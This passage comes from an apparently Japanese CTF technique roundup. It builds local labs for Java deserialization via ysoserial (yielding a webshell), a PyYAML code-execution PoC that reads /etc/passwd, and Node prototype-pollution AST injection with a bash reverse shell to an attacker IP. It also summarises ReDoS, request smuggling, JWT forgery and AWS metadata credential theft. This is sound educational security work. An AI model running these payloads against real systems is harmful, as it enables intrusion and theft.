をダウンロードしてくる必要があります。
./ ├── Dockerfile ├── src │ └── demo │ └── SimpleServlet.java └── webapps └── demo └── WEB-INF ├── classes │ └── demo ├── lib │ └── commons-collections-3.2.1.jar └── web.xml
Dockerfile
FROM tomcat:8-jdk11-adoptopenjdk-hotspot COPY src/ /src/ COPY webapps/ /usr/local/tomcat/webapps/ RUN javac -cp "/usr/local/tomcat/lib/*" /src/demo/SimpleServlet.java -d /usr/local/tomcat/webapps/demo/WEB-INF/classes/
POSTされたデータをそのままデシリアライズをかけるサーブレットを用意します。
src/demo/SimpleServlet.java
package demo; import java.io.*; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.ServletException; import javax.servlet.ServletInputStream; public class SimpleServlet extends HttpServlet { protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { ServletInputStream sis = request.getInputStream(); ObjectInputStream ois = new ObjectInputStream(sis); try { ois.readObject(); } catch (ClassNotFoundException e) { e.printStackTrace(); } ois.close(); } protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { PrintWriter out = response.getWriter(); out.println("This is a demo"); } }
webapps/demo/WEB-INF/web.xml
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" version="3.1"> <servlet> <servlet-name>SimpleServlet</servlet-name> <servlet-class>demo.SimpleServlet</servlet-class> </servlet> <servlet-mapping> <servlet-name>SimpleServlet</servlet-name> <url-pattern>/SimpleServlet</url-pattern> </servlet-mapping> </web-app>
コンテナをビルドして起動します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# docker build --no-cache -t tomcat-deserialize-demo . Sending build context to Docker daemon 1.742MB Step 1/4 : FROM tomcat:8-jdk11-adoptopenjdk-hotspot ---> e13d5dd8fd3c Step 2/4 : COPY src/ /src/ ---> f0bb0cf2d0e6 Step 3/4 : COPY demo/ /usr/local/tomcat/webapps/demo/ ---> f26a56d53147 Step 4/4 : RUN javac -cp "/usr/local/tomcat/lib/*" /src/demo/SimpleServlet.java -d /usr/local/tomcat/webapps/demo/WEB-INF/classes/ ---> Running in b7d6889514e9 Removing intermediate container b7d6889514e9 ---> 3a3e9708dff5 Successfully built 3a3e9708dff5 Successfully tagged tomcat-deserialize-demo:latest root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# docker run --rm -p 8080:8080 --name tomcat-deserialize-demo tomcat-deserialize-demo (snip) 07-Aug-2021 04:08:29.442 INFO [main] org.apache.coyote.AbstractProtocol.start Starting ProtocolHandler ["http-nio-8080"] 07-Aug-2021 04:08:29.460 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 463 ms
次にysoserialのリポジトリを取得してきて、Dockerコンテナ上でビルドします。ただ、そのまま実行するとmavenのビルドでエラーになったため、pom.xmlを一部修正します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# git clone https://github.com/threedr3am/ysoserial.git (snip) root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# cd ysoserial root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize/ysoserial# sed -i 's@http://repo.jenkins-ci.org/public/@https://repo.jenkins-ci.org/public/@' pom.xml root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize/ysoserial# docker build -t ysoserial:threedr3am . (snip)
ysoserialでpayloadを生成し、順番に送信します。
# payloadを生成 root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# docker run --rm ysoserial:threedr3am CommonsCollections11ForTomcatEchoInject > echo.payload root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# docker run --rm ysoserial:threedr3am CommonsCollections11ForTomcatShellInject > shell.payload # 生成したecho.payloadとshell.payloadを送信 root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# curl localhost:8080/demo/SimpleServlet --data-binary "@./echo.payload" -v * Trying ::1:8080... * Connected to localhost (::1) port 8080 (#0) > POST /demo/SimpleServlet HTTP/1.1 > Host: localhost:8080 > User-Agent: curl/7.72.0 > Accept: */* > Content-Length: 4023 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 4023 out of 4023 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 < Content-Type: text/html;charset=utf-8 < Content-Language: en < Content-Length: 7249 < Date: Sat, 07 Aug 2021 04:13:17 GMT < Connection: close < <!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' threw an exception</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.apache.commons.collections.FunctorException: InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' threw an exception org.apache.commons.collections.functors.InvokerTransformer.transform(InvokerTransformer.java:133) (snip) </pre><p><b>Note</b> The full stack trace of the root cause is available in t* Closing connection 0 root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# curl localhost:8080/demo/SimpleServlet --data-binary "@./shell.payload" -v * Trying ::1:8080... * Connected to localhost (::1) port 8080 (#0) > POST /demo/SimpleServlet HTTP/1.1 > Host: localhost:8080 > User-Agent: curl/7.72.0 > Accept: */* > Content-Length: 9864 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 9864 out of 9864 bytes * Mark bundle as not supporting multiuse < HTTP/1.1 500 < Content-Type: text/html;charset=utf-8 < Content-Language: en < Content-Length: 7249 < Date: Sat, 07 Aug 2021 04:13:34 GMT < Connection: close < <!doctype html><html lang="en"><head><title>HTTP Status 500 – Internal Server Error</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500 – Internal Server Error</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' threw an exception</p><p><b>Description</b> The server encountered an unexpected condition that prevented it from fulfilling the request.</p><p><b>Exception</b></p><pre>org.apache.commons.collections.FunctorException: InvokerTransformer: The method 'newTransformer' on 'class com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' threw an exception org.apache.commons.collections.functors.InvokerTransformer.transform(InvokerTransformer.java:133) (snip) </pre><p><b>Note</b> The full stack trace of the root cause is available in t* Closing connection 0 he server logs.</p><hr class="line" /><h3>Apache Tomcat/8.5.69</h3></body></html>
WebShell機能を持つフィルタが組み込まれたので、OSコマンドを実行するリクエストを発行すると、コマンド実行を確認できます。
root@kali:/mnt/hgfs/CTF/Writeup/2020/tomcat-deserialize# curl http://localhost:8080/demo/SimpleServlet?ppppp=ls bin BUILDING.txt conf CONTRIBUTING.md lib LICENSE logs native-jni-lib NOTICE README.md RELEASE-NOTES RUNNING.txt temp webapps webapps.dist work
- writeup
- SCTF-XCTF 2020 - Login Me Aagin
https://ctftime.org/writeup/22158
- SCTF-XCTF 2020 - Login Me Aagin
おまけ:ysoserialのJRMPListnerとJRMPClientの使い方
本家のysoserialのPayloadのうち、JRMPListner
とJRMPClient
の使い方がいまいちわかっていませんでしたが、
上記の検証のついでに調べたところ、以下の記事が参考になりました。
https://afinepl.medium.com/testing-and-exploiting-java-deserialization-in-2021-e762f3e43ca2
ただ、JEP(JDK Enhancement Proposals) 290のデシリアライゼーション・フィルタの導入以降は使用できないようです。
一応、実際に環境構築して試行しましたが、java.io.ObjectInputStream.filterCheck ObjectInputFilter REJECTED
と表示されてデシリアライズできませんでした。
.NETアプリケーション向けの安全でないデシリアライゼーション攻撃
ysoserialはJava用ですが、.NET用のysoserialもあります。
ysoserial.net
https://github.com/pwntester/ysoserial.net
- writeup
- AppSec-IL 2020 CTF - WhoAmI
https://jctf.team/AppSec-IL-2020/WhoAmI/
- AppSec-IL 2020 CTF - WhoAmI
PyYAMLのyaml.load関数の脆弱性を使用して任意のコード実行
PyYAMLのyaml.load
関数に任意の文字列を渡せる場合に、任意のコードを実行できる脆弱性を突いた攻撃手法です。
複数のコンテストで出題されており、最新バージョンでは対策されているような脆弱性を使用するものもありましたが、中でもUIUCTF 2020のコンテスト中に編み出された手法は0day脆弱性となり、コンテスト後にCVE-2020-14343が割り当てられました。そのPoCコードはこちらです。
!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('cat /etc/passwd')"
以下、参考ページです。
https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf
https://github.com/yaml/pyyaml/issues/420
- writeup
- AppSec-IL 2020 CTF - Resume.yml
https://jctf.team/AppSec-IL-2020/Resume.yml/ - CyberSecurityRumble CTF- Wheels n Whales
https://github.com/tHoMaStHeThErMoNuClEaRbOmB/ctfwriteups/blob/master/CyberSecurityRumblectf/web/Wheels_n_Whales/README.md - UIUCTF 2020 - deserializeme
https://hackmd.io/@harrier/uiuctf20 - FwordCTF 2020 - useless
https://github.com/Super-Guesser/ctf/tree/master/2020/Fword%20CTF%202020/web/useless
- AppSec-IL 2020 CTF - Resume.yml
Prototype Pollution
AST Injection
プロトタイプ汚染の脆弱性が存在する場合に、 テンプレートエンジンがコードからAbstract syntax tree(抽象構文木)を組み立てる処理に介在して、 ASTを追加することで、任意の関数を実行する手法です。
以下の記事が参考になります。
https://blog.p6.is/AST-Injection/
上記の記事の写経に近いですが、手を動かさないと覚えないため、実際に試してみましょう。
まずは環境構築です。Dockerを使用します。
Dockerfile
FROM node:12 WORKDIR /usr/src/app COPY package*.json ./ RUN npm install COPY server.js server.js EXPOSE 8080 CMD [ "node", "server.js" ]
server.js
const express = require('express'); const { unflatten } = require('flat'); const bodyParser = require('body-parser'); const Handlebars = require('handlebars'); const app = express(); app.use(bodyParser.json()) app.get('/', function (req, res) { var source = "<h1>It works!</h1>"; var template = Handlebars.compile(source); res.end(template({})); }); app.post('/vulnerable', function (req, res) { let object = unflatten(req.body); res.json(object); }); app.listen(8080);
package.jsonでは、flatのバージョンを脆弱性のある5.0.0
に指定します。
{ "name": "astinjection-demo", "version": "1.0.0", "description": "Node.js on Docker", "author": "none", "main": "server.js", "scripts": { "start": "node server.js" }, "dependencies": { "body-parser": "^1.19.0", "express": "^4.17.1", "flat": "5.0.0", "handlebars": "^4.7.7" } }
コンテナをビルドして起動します。
root@kali:/mnt/hgfs/CTF/Writeup/2020/nodejs-ast# docker build -t nodejs-astinjection-demo . Sending build context to Docker daemon 6.144kB Step 1/7 : FROM node:12 ---> 7e90b11a78a2 Step 2/7 : WORKDIR /usr/src/app ---> Using cache ---> 58a2fa8330f3 Step 3/7 : COPY package*.json ./ ---> 08dfbea4e2ee Step 4/7 : RUN npm install ---> Running in ef1f57a9565a npm WARN deprecated flat@5.0.0: Fixed a prototype pollution security issue in 5.0.0, please upgrade to ^5.0.1. # 承知の上ですね npm notice created a lockfile as package-lock.json. You should commit this file. npm WARN astinjection-demo@1.0.0 No repository field. npm WARN astinjection-demo@1.0.0 No license field. added 58 packages from 77 contributors and audited 58 packages in 2.746s 1 package is looking for funding run `npm fund` for details found 0 vulnerabilities Removing intermediate container ef1f57a9565a ---> 4da0a49d100b Step 5/7 : COPY server.js server.js ---> fd5069ebe28b Step 6/7 : EXPOSE 8080 ---> Running in e95d54a4009b Removing intermediate container e95d54a4009b ---> ef2213ff08f2 Step 7/7 : CMD [ "node", "server.js" ] ---> Running in 3a27159df156 Removing intermediate container 3a27159df156 ---> 42c1b42ca7da Successfully built 42c1b42ca7da Successfully tagged nodejs-astinjection-demo:latest # コンテナ起動。--initはCTRL+Cで終了できないための措置。 # 参考:https://github.com/nodejs/docker-node/blob/main/docs/BestPractices.md#handling-kernel-signals root@kali:/mnt/hgfs/CTF/Writeup/2020/nodejs-ast# docker run --init --rm -p 8080:8080 --name nodejs-astinjectiondemo nodejs-astinjection-demo
exploit.py
import requests TARGET_URL = 'http://localhost:8080' # make pollution requests.post(TARGET_URL + '/vulnerable', json = { "__proto__.type": "Program", "__proto__.body": [{ "type": "MustacheStatement", "path": 0, "params": [{ "type": "NumberLiteral", "value": "process.mainModule.require('child_process').execSync(`bash -c 'bash -i >& /dev/tcp/<リバースシェル先のIPアドレス>/4444 0>&1'`)" }], "loc": { "start": 0, "end": 0 } }] }) # execute r = requests.get(TARGET_URL) print(r.text)
実行すると、リバースシェルの接続要求が返ってきたため、OSコマンドが実行されたことを確認できました。
root@kali:/mnt/hgfs/CTF/Writeup/2020/nodejs-ast# python3 exploit.py root@kali:/mnt/hgfs/CTF/Writeup/2020/nodejs-ast# nc -nvlp 4444 listening on [any] 4444 ... connect to [172.32.0.1] from (UNKNOWN) [172.17.0.2] 40440 bash: cannot set terminal process group (6): Inappropriate ioctl for device bash: no job control in this shell root@dd27f18fe95a:/usr/src/app# id id uid=0(root) gid=0(root) groups=0(root)
- writeup
- HTB University CTF 2020 Quals - Gunship
https://github.com/kukuxumushi/HTBxUNI-CTF-quals-writeups/blob/master/Gunship.md
- HTB University CTF 2020 Quals - Gunship
Regular expression Denial of Service(ReDoS)
Go言語の正規表現ライブラリ向けのReDosによるBlind Regular Expression Injection Attack
Go言語で使用している正規表現ライブラリであるRE2は非バックトラッキング正規表現エンジンとのことで、
よくReDoSの攻撃例で見るような(.*)*
といった正規表現を使用しても、
計算量が膨れ上がってタイムアウトするようなことはありません。
その場合、以下のような正規表現を実行させることでReDoSを発生させることができます。
...
の部分は、(.?){1000}
を繰り返すことで、計算量が増えて実行時間が伸びていきます。
^flag(.?){1000}(.?){1000}(.?){1000}(.?){1000}(.?){1000}...(.?){1000}salt$
上記の例では、評価対象の文字列がflag_hogehoge_salt
のように、先頭部分がマッチする場合、計算量が大きくなり実行時間がかかります。一方、以下のように先頭部分がマッチしなければすぐに結果が返ってきます。
^flaa(.?){1000}(.?){1000}(.?){1000}(.?){1000}(.?){1000}...(.?){1000}salt$
よって、その時間差を観察することで、Blind Regular Expression Injection Attackで評価対象の文字列の情報を窃取できます。
考え方は以下のリンク先のwriteupを参照ください。
- writeup
- TSG CTF 2020 - Slick Logger
https://github.com/tsg-ut/tsgctf2020/blob/master/web/slick_logger/writeup.md
- TSG CTF 2020 - Slick Logger
{}()+*記号を使用しないReDoSによるBlind Regular Expression Injection Attack
ReDoSを発生させる正規表現で使用するような{}()+*
記号を使用せずに、ReDoSを発生させる手法です。
単純に.?
を大量に連結させて、末尾に評価対象の文字列にマッチしない文字(salt)を付与するだけで発動します。
実際に試してみましょう。
# 先頭部分がマッチしないと、即座に結果が返ってくる。 >>> re.match("^flag_a"+".?"*50+"salt", "flag_hogehoge_fugafuga"); # 先頭部分がマッチすると、1分以上待っても結果が返ってこない。CTRL+Cで中断。 >>> re.match("^flag_h"+".?"*50+"salt", "flag_hogehoge_fugafuga"); ^CTraceback (most recent call last): File "<stdin>", line 1, in <module> File "/usr/lib/python3.8/re.py", line 191, in match return _compile(pattern, flags).match(string) KeyboardInterrupt
- writeup
- TSG CTF 2020 - Note2
https://github.com/mdsnins/ctf-writeups/blob/master/2020/TSGCTF/Note2/note2.md
非想定解だったようです。
- TSG CTF 2020 - Note2
WappalyzerのReDos脆弱性
Webサイトがどういったプラットフォーム、フレームワーク、ライブラリを使用しているか検出する、Wappalyzerというブラウザの拡張機能があります。
https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=ja
Pwn2win CTF 2020のWatchersという問題ではWappalyzerのCLI版を実行しており、その結果をタイムアウトさせることで目的とするコードの条件分岐に進めることができましたが、ReDoSの脆弱性を突くことでタイムアウトを発生させる解法でした。
- writeup
Side Channel Attack
CSP Embedded Enforcementの悪用
CSP Embedded Enforcementとは、iframe
タグで読み込むページにcsp
属性でCSPのポリシーを付与できる仕様です。
但し、読み込んだページから、より制限の緩いポリシーが返却された場合は、Webブラウザがブロックします。
pbctf 2020のXSPという問題では、管理者にXSS攻撃を仕掛けるために、
管理者がターゲットのWebサイトにアクセスした際にHTTPレスポンスヘッダーで返却される、
管理者用のCSPのポリシーを窃取する必要がありました。
そこに、iframe
タグでターゲットのWebサイトを読み込んでcsp
属性でポリシーを付与し、
WebブラウザがブロックしたかどうかでCSPのポリシーを特定する手法が使用されました。
Webブラウザの機能によりブロックされるかどうかで1文字ずつ特定するという点では、 2019年のCTFで少し流行ったXS-Searchと似ています。
実際に試してみます。
CSPヘッダーをHTTPレスポンスヘッダーで返却する簡単なWebサイトを用意します。
このhttp://localhost/aa/bb
を取得することを目的とします。(本当は管理者やユーザごとにURLが異なりますが省略。)
from http.server import BaseHTTPRequestHandler, HTTPServer address = ('localhost', 80) class MyHTTPRequestHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html; charset=utf-8') self.send_header('Content-Security-Policy', "default-src 'none'; script-src http://localhost/aa/bb") self.end_headers() self.wfile.write(b"OK") with HTTPServer(address, MyHTTPRequestHandler) as server: server.serve_forever()
script-src
のURLが異なるポリシーをcsp
属性にセットした、iframe
タグを設置します。
ターゲットのWebサイト(この例ではlocalhost)がHTTPレスポンスヘッダーで返却するポリシーに包含される
ポリシーをセットしているiframe
は正常に表示され、包含されない=制限の緩いポリシーをセットしているiframe
はブロックされるはずです。
<!DOCTYPE html> <html> <head> <title>CSP Embedded Enforcement Test</title> </head> <body> http://localhost/aa/ <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/aa/"></iframe><br> http://localhost/bb/ <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/bb/"></iframe><br> http://localhost/cc/ <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/cc/"></iframe><br> http://localhost/aa/aa <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/aa/aa"></iframe><br> http://localhost/aa/bb <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/aa/bb"></iframe><br> http://localhost/aa/cc <iframe src="http://localhost/hoge" csp="default-src 'none'; script-src http://localhost/aa/cc"></iframe><br> </body> </html>
script-src
にhttp://localhost/aa/
とhttp://localhost/aa/bb
をセットしたiframe
が表示されました。
この例では、CSP Embedded Enforcementの動きを理解することを優先して、
/aa/
や/aa/bb
を決め打ちにしたiframe
を用意して試しましたが、
本来は、スクリプトを書いて1文字ずつつ特定する必要があります。
- writeup
Cache Poisoning
HTML5のApplicaiton Cacheのキャッシュポイゾニング
ångstromCTF 2020のUBIという問題は、複数の脆弱性を活用、連携させながら解く必要があり、かなり面白い問題でした。
その中でも、HTTP Header Injectionを使用してHTTPレスポンスヘッダーのContent-Type
にtext/cache-manifest
を付与することで、管理者にApplicaiton Cacheのマニフェストファイルを読み込ませてキャッシュを使用させるという点が面白い手法でした。
詳細な説明は、以下のwriteupが参考になります。
- writeup
- ångstromCTF 2020 - UBI
https://tech.kusuwada.com/entry/2020/04/05/132308#section4
- ångstromCTF 2020 - UBI
HTTP Request Smuggling
Transfer-EncodingやContent-Lengthの解釈の違いを利用したHTTP Request Smuggling
Transfer-Encoding
やContent-Length
のHTTPリクエストヘッダーに通常とは異なる値がセットされていた場合に、
HTTPサーバーやプロキシサーバーのソフトウェアによってその解釈が異なることを利用して、
HTTP Request Smugglingを起こして、バックエンドへのリクエストを発行させたり、
他人のHTTPレスポンスを横取りする手法です。
以下の記事が参考になります。
https://portswigger.net/web-security/request-smuggling
昨年のDEF CON CTF Qualifierでも出題されており、当ブログでもwriteupを公開しています。
- writeup
- DEF CON CTF Qualifier 2020 - uploooadit
https://graneed.hatenablog.com/entry/2020/05/21/092221 - SpamAndFlags CTF - BabyWAF
https://blog.deteact.com/gunicorn-http-request-smuggling/
- DEF CON CTF Qualifier 2020 - uploooadit
WebSocket経由のHTTP Request Smuggling
リバースプロキシにHTTP/1.1のアップグレード要求をして、 バックエンドのサーバーとWebSocket通信を確立してTCPトンネルを張ることで、 本来、公開していないはずのバックエンドのエンドポイントにリクエストを発行する手法です。
以下の記事が参考になります。
https://github.com/0ang3el/websocket-smuggle
また、この手法を使用するHack.lu CTF 2020のFluxCloud Frontlineという問題では、 その前にFirewallをバイパスする必要もありました。 そのために、接続先のHostとは異なるServer Name Indication(SNI)を指定してTLS接続することで、 SNI情報を元にアクセスコントロールをしているFirewallをバイパスするという手法も使用されていました。
- writeup
- Hack.lu CTF 2020 - FluxCloud Frontline
https://infosecwriteups.com/fluxcloud-frontline-writeup-8e2dbf095d57
- Hack.lu CTF 2020 - FluxCloud Frontline
HTTP/2 Cleartext(h2c)経由のHTTP Request Smuggling
上記の手法は、WebSocket通信へのアップグレードでしたが、 こちらはHTTP/2通信へのアップグレードにより、TCPトンネルを張る手法です。
以下の記事が参考になります。
https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c
ツールとデモ環境も公開されています。
https://github.com/BishopFox/h2csmuggler
写経に近いですが、手を動かさないと覚えないため、実際に試してみましょう。
root@kali:/mnt/hgfs/CTF/Writeup/2020/h2c-smuggling/h2csmuggler# ./configs/generate-certificates.sh Generating RSA private key, 2048 bit long modulus (2 primes) ......................................................................................+++++ ..........+++++ e is 65537 (0x010001) # HAProxyのコンテナ起動時に80と443ポートをバインドする権限がなくPermission deniedになったため、 # docker-compose.ymlとhaproxy.cfgのポート番号の設定を、80→10080、443→10443に変更。 root@kali:/mnt/hgfs/CTF/Writeup/2020/h2c-smuggling/h2csmuggler# docker-compose up Creating network "h2csmuggler_default" with the default driver (snip) backend_1 | Listening [0.0.0.0:80]... haproxy_1 | [NOTICE] (1) : New worker #1 (7) forked nginx_1 | /docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration nginx_1 | /docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/ nginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh nginx_1 | 10-listen-on-ipv6-by-default.sh: info: IPv6 listen already enabled nginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh nginx_1 | /docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh nginx_1 | /docker-entrypoint.sh: Configuration complete; ready for start up nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: using the "epoll" event method nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: nginx/1.21.1 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: built by gcc 8.3.0 (Debian 8.3.0-6) nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: OS: Linux 5.6.0-kali1-amd64 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: getrlimit(RLIMIT_NOFILE): 1048576:1048576 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: start worker processes nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: start worker process 23 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: start worker process 24 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: start worker process 25 nginx_1 | 2021/08/07 20:26:34 [notice] 1#1: start worker process 26 nuster_1 | [NOTICE] 218/202635 (1) : New worker #1 (7) forked nginx_1 | 172.20.0.1 - - [07/Aug/2021:20:26:57 +0000] "GET / HTTP/2.0" 200 20 "-" "curl/7.72.0"
デモ環境には複数のプロキシサーバーが立っていますが、nginxのプロキシサーバーを対象に試してみます。
確かにプロキシサーバーで許可していないはずの/flag
に対するアクセスが
バックエンドのサーバーに到達していることが確認できました。
# まずはcurlでインデックスページにアクセスすると成功 root@kali:/mnt/hgfs/CTF/Writeup/2020/h2c-smuggling/h2csmuggler# curl https://localhost:8002/ -k Hello, /, http: true # curlで/flagにアクセスするとエラー root@kali:/mnt/hgfs/CTF/Writeup/2020/h2c-smuggling/h2csmuggler# curl https://localhost:8002/flag -k <html> <head><title>403 Forbidden</title></head> <body> <center><h1>403 Forbidden</h1></center> <hr><center>nginx/1.21.1</center> </body> </html> # ツールを使用するとバックエンドの/flagにアクセス可能 root@kali:/mnt/hgfs/CTF/Writeup/2020/h2c-smuggling/h2csmuggler# python ./h2csmuggler.py -x https://localhost:8002/ http://backend/flag [INFO] h2c stream established successfully. :status: 200 content-type: text/plain; charset=utf-8 content-length: 20 date: Sat, 07 Aug 2021 20:32:29 GMT Hello, /, http: true [INFO] Requesting - /flag :status: 200 content-type: text/plain; charset=utf-8 content-length: 17 date: Sat, 07 Aug 2021 20:32:29 GMT You got the flag!
- writeup
- boot2root 2020 - Smuggle
https://github.com/Red-Knights-CTF/writeups/tree/master/2020/Boot2root_ctf/Smuggle
- boot2root 2020 - Smuggle
JWT改ざん
RS256の公開鍵をHS256の共通鍵として使用してJWTを署名
JWTの署名にRS256のアルゴリズムを使用する場合、クライアント側で署名検証するために公開鍵が公開されます。
そこで、サーバー側でRS256の公開鍵をHS256の共通鍵としても使用している場合、 JWTのPayloadを改ざんしてから、HS256アルゴリズムに変更してRS256の公開鍵で署名してサーバーに送信することで、 サーバー側の署名検証を通すことができるという手法です。
以下の記事が参考になります。
https://scgajge12.hatenablog.com/entry/jwt_security
JWT関連の作業にはThe JSON Web Token Toolkitが便利です。
https://github.com/ticarpi/jwt_tool
- writeup
- HSCTF 7 - Broken Tokens
https://qiita.com/takdcloose/items/d25fff32c98b48b3c648 - AppSec-IL 2020 CTF - Mr.Voorhees
https://jctf.team/AppSec-IL-2020/Mr.Voorhees/
- HSCTF 7 - Broken Tokens
jkuヘッダーを自分の公開鍵に変更および秘密鍵を使用してJWTを署名
JWTにはjku
というヘッダーパラメータがあり、JWTの署名検証に使用する公開鍵の置き場を指定できます。
そこで、事前準備として、自分で秘密鍵と公開鍵を生成してから、 公開鍵をターゲットのサーバーへアップロードしたりサーバーを立てるなどして、 ターゲットのサーバーのアプリケーションからアクセス可能な場所に公開します。
そして、jku
ヘッダーパラメータをその公開鍵の置き場所に変更し、
JWTのPayloadを改ざんしてから、秘密鍵で署名してサーバーに送信することで、
サーバー側の署名検証を通すことができるという手法です。
こちらの手法も同じくThe JSON Web Token Toolkitが使用できます。
- writeup
- NahamCon CTF 2020 - Flag jokes
https://github.com/saw-your-packet/ctfs/blob/master/NahamCon%20CTF%202020/Write-ups.md#flag-jokes - MetaCTF CyberGames 2020 - Joy with Tokens
https://www.uzpg.me/cyber-security/2020/10/26/writeups-for-metactf-2020#joy-with-tokens
- NahamCon CTF 2020 - Flag jokes
polyglot
DNSとProtocol Buffersのpolyglot
DNSとProtocol Buffersの両方のデータフォーマットを満たすようなレコードを作成する必要のある問題でした。
作問者から問題ファイルとexploitコードが公開されています。ただし、解説はありません。
https://github.com/pspaul/ctf-challenges/tree/master/hacklu-2020/fluxcloud-doh
問題の解説は、以下のスライドが参考になります。
https://slides.com/hakatashi/witchs_key_party#/3
WebAssembly
WebAssemblyのReversing
WebAssemblyのReversingをする問題も何問か出題されていました。
当ブログでもwriteupを公開しています。
- writeup
- UTCTF 2020 - Wasm Fans Only
https://graneed.hatenablog.com/entry/2020/12/22/021715 - b01lers CTF - alien_tech
https://klatz.co/ctf-blog/boilerctf-alien-tech
- UTCTF 2020 - Wasm Fans Only
Machine Learning
ニューラルネットワークを使用した文字解析
Minecraftのゲーム内で使用されているStandard Galactic Alphabetで書かれた大量の文字画像を、 一定時間内に読み解いて入力するとFLAGが得られる問題です。
人間ではクリアできない時間と量であるため機械学習を使用する必要があります。
2019年のSANS Holiday Hack Challengeでも機械学習を使用して画像処理する問題が出題されました。
https://graneed.hatenablog.com/entry/2020/01/13/215809#8-Bypassing-the-Frido-Sleigh-CAPTEHA
- writeup
- UIUCTF 2020 - Bot Protection IV
https://blog.srikavin.me/posts/uiuctf20-solving-minecraft-captchas/
- UIUCTF 2020 - Bot Protection IV
AWS
AWSのインスタンスメタデータから認証情報取得してから権限昇格
SSRFの脆弱性を使用してAWSのインスタンスメタデータにアクセスし、 EC2インスタンスにアタッチされているIAMロールの認証情報を取得してから、 そのIAMロールの権限を使用して更に別のIAMユーザの認証情報を取得し権限昇格する問題です。
AWS用のペンテストツールとして有名な、pacuを使用しました。
https://github.com/RhinoSecurityLabs/pacu
当ブログでもwriteupを公開しています。
- writeup
- nullcon HackIM 2020 Writeup - Lateral Movement
https://graneed.hatenablog.com/entry/2020/02/09/143415
- nullcon HackIM 2020 Writeup - Lateral Movement
S3バージョニングの確認
AWS S3にはバージョニング機能があり、有効化した状態でオブジェクトを更新すると、過去のバージョンも保持されます。
よって、S3バケットの一覧表示が可能な場合、バージョンの確認も必要です。
なお、正確には、一覧表示にはListBucket
権限、バージョンの確認にはListBucketVersions
権限が必要となるため、
一覧表示できたとしてもバージョンまで確認できるとは限りません。
実際に試してみましょう。
誰でもListBucket
とListBucketVersions
が可能なS3バケットを用意します。
flag.txt
をアップロードして、更に内容を変更して再アップロードし、2世代保持します。
